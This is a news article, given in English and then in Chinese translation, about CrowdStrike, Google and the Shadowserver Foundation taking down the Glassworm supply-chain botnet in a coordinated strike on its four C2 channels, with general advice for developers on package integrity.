A joint operation by CrowdStrike, Google, and the Shadowserver Foundation brought down the Glassworm botnet on May 26, 2026, by simultaneously disabling all four of its command-and-control (C2) channels in a single coordinated strike. The operation, reported by Security Affairs, took place at 14:00 UTC and was designed to prevent the botnet's operators from adapting or rerouting traffic to backup infrastructure.
The precision timing was critical. Disrupting the C2 channels one at a time would have given attackers the opportunity to pivot to alternative servers and keep the botnet alive.
A Supply-Chain Threat Built for Developers
Glassworm stood out from typical botnets because of how it spread. Rather than relying on phishing emails or exploit kits targeting end users, the malware infiltrated developer environments through poisoned tools and compromised software packages. This supply-chain approach meant that developers — often trusted as sophisticated, security-aware users — became unwitting infection vectors.
The tactic reflects a growing trend in the threat landscape. Attackers have increasingly recognized that software supply chains offer high-leverage entry points: a single compromised package can cascade into thousands of downstream installations. Recent years have seen a steady rise in malicious packages appearing in popular repositories, and Glassworm represented one of the more ambitious efforts to exploit this trust model at scale.
Why Simultaneous Takedown Mattered
Botnet operators typically build redundancy into their infrastructure. Glassworm maintained four separate C2 channels, meaning that if researchers had shut down only one or two, the remaining channels could have continued orchestrating infections and distributing updated malware payloads.
By coordinating to neutralize all four channels at exactly the same moment, the operation left no room for the attackers to react. This "one-shot" approach has become an increasingly preferred tactic among cybersecurity teams conducting botnet takedowns, as it minimizes the window during which compromised systems remain under attacker control.
Cross-Sector Collaboration Sets the Standard
The operation brought together three distinct types of organizations. CrowdStrike's Counter Adversary Operations team provided threat intelligence and technical expertise. Google contributed infrastructure and resources. The Shadowserver Foundation, a nonprofit that specializes in tracking and mitigating botnet activity, played a role in monitoring and sinkholing the C2 traffic.
This kind of cross-sector partnership — uniting a private cybersecurity firm, a major technology company, and a nonprofit — has become a hallmark of modern botnet disruption efforts. No single organization typically has visibility into the full scope of a botnet's operations, making collaboration essential for successful takedowns.
Broader Implications for the Developer Community
The Glassworm incident serves as a reminder that the tools and packages developers rely on daily can be weaponized. For the open-source and developer communities, the attack underscores the importance of verifying package integrity, monitoring dependencies for unexpected changes, and adopting security practices such as software bills of materials (SBOMs) and signed releases.
While the coordinated takedown has severed Glassworm's C2 infrastructure, compromised developer machines may still carry residual malware. Security researchers are expected to release indicators of compromise (IoCs) to help affected users identify and clean infected systems.
The operation demonstrates that even complex, well-architected botnets can be dismantled effectively when the cybersecurity community acts together — and acts fast.
由 CrowdStrike、Google 及 Shadowserver 基金會發起的一次聯合行動,於 2026 年 5 月 26 日一舉關閉了 Glassworm 殭屍網絡的所有四個指揮與控制(C2)頻道,將其徹底癱瘓。據 Security Affairs 報導,此次行動於協調世界時 14:00 進行,旨在防止殭屍網絡操控者適應情況或將流量重新導向至備用基礎設施。
精準的時機掌握至關重要。若逐個關閉 C2 頻道,攻擊者便有機會轉移至其他伺服器,使殭屍網絡得以維持運作。
專為開發者打造的供應鏈威脅
Glassworm 與典型殭屍網絡的不同之處在於其傳播方式。它並非依賴針對終端用戶的釣魚郵件或攻擊工具套件,而是透過受污染的工具及遭篡改的軟件套件滲透開發者環境。這種供應鏈攻擊手法意味著,往往被視為具備較高安全意識的資深用戶的開發者,在不知情的情況下成為了感染傳播的媒介。
這種策略反映了威脅形勢中的一種日益增長的趨勢。攻擊者愈發認識到軟件供應鏈提供了高槓桿的入侵點:單一一個被污染的套件,便可能衍生出數以千計的下游安裝。近年來,熱門代碼倉庫中出現惡意套件的情況穩步增加,而 Glassworm 正是意圖大規模利用此信任模型的更為大膽嘗試之一。
為何同時癱瘓至關重要
殭屍網絡操控者通常會在其基礎設施中建立冗餘。Glassworm 維持著四個獨立的 C2 頻道,這意味著如果研究人員僅關閉其中一兩個,剩餘頻道仍可繼續協調感染並分發更新的惡意軟件載荷。
透過協調在完全相同的時刻癱瘓所有四個頻道,此次行動未給攻擊者留下任何反應空間。這種「一擊即中」的策略,已成為網絡安全團隊執行殭屍網絡清除行動時日益偏好的手段,因為它能最大程度縮減受感染系統處於攻擊者控制下的時間窗口。
跨部門協作樹立標杆
此次行動匯集了三種不同類型的組織。CrowdStrike 的反對手行動團隊提供了威脅情報及技術專長。Google 貢獻了基礎設施與資源。專門追踪及緩解殭屍網絡活動的非牟利機構 Shadowserver 基金會,則在監控及 sinkhole 處理 C2 流量方面發揮了作用。
這種跨部門合作模式——結合私營網絡安全公司、大型科技企業及非牟利機構——已成為現代殭屍網絡打擊工作的標誌。單一組織通常無法全面掌握殭屍網絡運作的整體範疇,因此協作對於成功清除行動至關重要。
對開發者社群的更廣泛啟示
Glassworm 事件提醒我們,開發者日常依賴的工具和套件可能被武器化。對於開源及開發者社群而言,此次攻擊凸顯了驗證套件完整性、監控依賴項以發現異常變更,以及採用諸如軟件物料清單及簽署發佈等安全實踐的重要性。
儘管此次協同打擊已切斷了 Glassworm 的 C2 基礎設施,但受感染的開發者電腦可能仍殘留惡意軟件。預期安全研究人員將發佈入侵指標,以協助受影響用戶識別並清理受感染系統。
此次行動證明,即使結構複雜、架構完善的殭屍網絡,只要網絡安全社群團結一致——且行動迅速——便能被有效瓦解。